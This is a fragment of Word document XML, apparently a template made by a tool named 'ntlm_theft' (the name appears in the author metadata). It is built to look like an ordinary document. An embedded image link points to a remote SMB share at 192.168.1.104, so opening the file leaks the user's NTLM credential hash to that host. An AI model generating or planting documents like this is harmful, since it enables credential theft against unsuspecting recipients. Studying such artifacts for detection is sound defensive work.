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A97E5F" w14:textId="451166BF" w:rsidR="00005B96" w:rsidRDefault="00AA3950">
      <w:r>
        <w:pict w14:anchorId="479F8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in;height:3in">
            <v:imagedata r:id="rId4"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00005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50"/>
    <w:rsid w:val="00005B96"/>
    <w:rsid w:val="00AA3950"/>
    <w:rsid w:val="00D9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799A9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C1AD256E-B343-4DFE-93A1-40B383068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file:///\\192.168.1.104\bad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ntlm_theft</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ntlm_theft</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-23T01:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-23T01:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>